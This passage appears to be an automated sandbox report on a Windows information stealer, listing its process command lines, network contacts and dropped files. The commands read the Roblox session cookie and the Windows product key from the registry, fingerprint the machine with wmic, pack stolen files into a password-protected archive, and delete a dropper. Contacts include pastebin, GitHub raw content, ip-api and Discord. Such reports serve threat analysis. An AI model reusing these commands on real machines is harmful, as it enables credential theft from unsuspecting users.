C:\Windows\system32\cmd.exe /c "powershell Get-ItemPropertyValue -Path HKLM:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell Get-ItemPropertyValue -Path HKLM:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\_MEI20042\rar.exe a -r -hp"blank123" "C:\Users\Admin\AppData\Local\Temp\s1rwU.zip" *"

C:\Users\Admin\AppData\Local\Temp\_MEI20042\rar.exe

C:\Users\Admin\AppData\Local\Temp\_MEI20042\rar.exe a -r -hp"blank123" "C:\Users\Admin\AppData\Local\Temp\s1rwU.zip" *

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "wmic os get Caption"

C:\Windows\System32\Wbem\WMIC.exe

wmic os get Caption

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "wmic computersystem get totalphysicalmemory"

C:\Windows\System32\Wbem\WMIC.exe

wmic computersystem get totalphysicalmemory

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "wmic csproduct get uuid"

C:\Windows\System32\Wbem\WMIC.exe

wmic csproduct get uuid

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "powershell Get-ItemPropertyValue -Path 'HKLM:System\CurrentControlSet\Control\Session Manager\Environment' -Name PROCESSOR_IDENTIFIER"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell Get-ItemPropertyValue -Path 'HKLM:System\CurrentControlSet\Control\Session Manager\Environment' -Name PROCESSOR_IDENTIFIER

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "wmic path win32_VideoController get name"

C:\Windows\System32\Wbem\WMIC.exe

wmic path win32_VideoController get name

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "powershell Get-ItemPropertyValue -Path 'HKLM:SOFTWARE\Microsoft\Windows NT\CurrentVersion\SoftwareProtectionPlatform' -Name BackupProductKeyDefault"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell Get-ItemPropertyValue -Path 'HKLM:SOFTWARE\Microsoft\Windows NT\CurrentVersion\SoftwareProtectionPlatform' -Name BackupProductKeyDefault

C:\Windows\system32\wbem\WmiApSrv.exe

C:\Windows\system32\wbem\WmiApSrv.exe

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "ping localhost -n 3 > NUL && del /A H /F "C:\Users\Admin\AppData\Local\Temp\RarSFX1\ss-a2.exe""

C:\Windows\system32\PING.EXE

ping localhost -n 3

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\RarSFX0\launch.bat" "

C:\Windows\System32\WScript.exe

"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\RarSFX0\inject.vbs"

Network

Country Destination Domain Proto
US 8.8.8.8:53 lookthis.space udp
DE 194.58.33.244:6455 lookthis.space tcp
US 8.8.8.8:53 244.33.58.194.in-addr.arpa udp
US 185.199.109.133:443 raw.githubusercontent.com tcp
US 185.199.109.133:443 raw.githubusercontent.com tcp
GB 216.58.204.67:443 gstatic.com tcp
US 185.199.109.133:443 raw.githubusercontent.com tcp
US 185.199.109.133:443 raw.githubusercontent.com tcp
US 185.199.109.133:443 raw.githubusercontent.com tcp
US 185.199.109.133:443 raw.githubusercontent.com tcp
US 185.199.109.133:443 raw.githubusercontent.com tcp
US 185.199.109.133:443 raw.githubusercontent.com tcp
US 185.199.109.133:443 raw.githubusercontent.com tcp
US 185.199.109.133:443 raw.githubusercontent.com tcp
US 104.20.3.235:443 pastebin.com tcp
US 172.67.147.44:80 lostyawolfer.com tcp
US 172.67.147.44:80 lostyawolfer.com tcp
US 208.95.112.1:80 ip-api.com tcp
US 162.159.136.232:443 discord.com tcp

Files

C:\Users\Admin\AppData\Local\Temp\RarSFX0\sigmasoft3.exe

C:\Users\Admin\AppData\Local\Temp\RarSFX1\ss.exe

C:\Users\Admin\AppData\Local\Temp\RarSFX1\ss-a.exe

C:\Users\Admin\AppData\Roaming\reviewDriverintodhcp\fK1YYsKuG.vbe

C:\Users\Admin\AppData\Local\Temp\RarSFX1\ss-a2.exe

C:\Users\Admin\AppData\Local\Temp\_MEI20042\python312.dll

C:\Users\Admin\AppData\Local\Temp\_MEI20042\VCRUNTIME140.dll

C:\Users\Admin\AppData\Local\Temp\_MEI20042\base_library.zip

C:\Users\Admin\AppData\Local\Temp\_MEI20042\_ctypes.pyd

C:\Users\Admin\AppData\Local\Temp\_MEI20042\_ssl.pyd

C:\Users\Admin\AppData\Local\Temp\_MEI20042\_sqlite3.pyd

C:\Users\Admin\AppData\Local\Temp\_MEI20042\_socket.pyd

C:\Users\Admin\AppData\Local\Temp\_MEI20042\_queue.pyd

C:\Users\Admin\AppData\Local\Temp\_MEI20042\_lzma.pyd

C:\Users\Admin\AppData\Local\Temp\_MEI20042\_hashlib.pyd

C:\Users\Admin\AppData\Local\Temp\_MEI20042\_decimal.pyd

C:\Users\Admin\AppData\Local\Temp\_MEI20042\_bz2.pyd

C:\Users\Admin\AppData\Local\Temp\_MEI20042\unicodedata.pyd

C:\Users\Admin\AppData\Local\Temp\_MEI20042\sqlite3.dll

C:\Users\Admin\AppData\Local\Temp\_MEI20042\select.pyd

C:\Users\Admin\AppData\Local\Temp\_MEI20042\rarreg.key

C:\Users\Admin\AppData\Local\Temp\_MEI20042\rar.exe

C:\Users\Admin\AppData\Local\Temp\_MEI20042\libssl-3.dll

C:\Users\Admin\AppData\Local\Temp\_MEI20042\libcrypto-3.dll

C:\Users\Admin\AppData\Local\Temp\_MEI20042\blank.aes

C:\Users\Admin\AppData\Local\Temp\_MEI20042\libffi-8.dll

C:\Users\Admin\AppData\Roaming\reviewDriverintodhcp\TPw4JEK.bat

C:\Users\Admin\AppData\Roaming\reviewDriverintodhcp\WinRuntime.exe

C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_b5ljigho.zcq.ps1

C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log

\??\c:\Users\Admin\AppData\Local\Temp\g3xs2c0d\g3xs2c0d.cmdline

\??\c:\Users\Admin\AppData\Local\Temp\g3xs2c0d\g3xs2c0d.0.cs

C:\Windows\System32\drivers\etc\hosts

\??\c:\Users\Admin\AppData\Local\Temp\g3xs2c0d\CSC1258BA46459645629AF8383C4D4B32DF.TMP

C:\Users\Admin\AppData\Local\Temp\RESE5.tmp

C:\Users\Admin\AppData\Local\Temp\g3xs2c0d\g3xs2c0d.dll

C:\Users\Admin\AppData\Local\Temp\f952880f-c74c-4b19-b008-6f790cefae50.vbs

C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
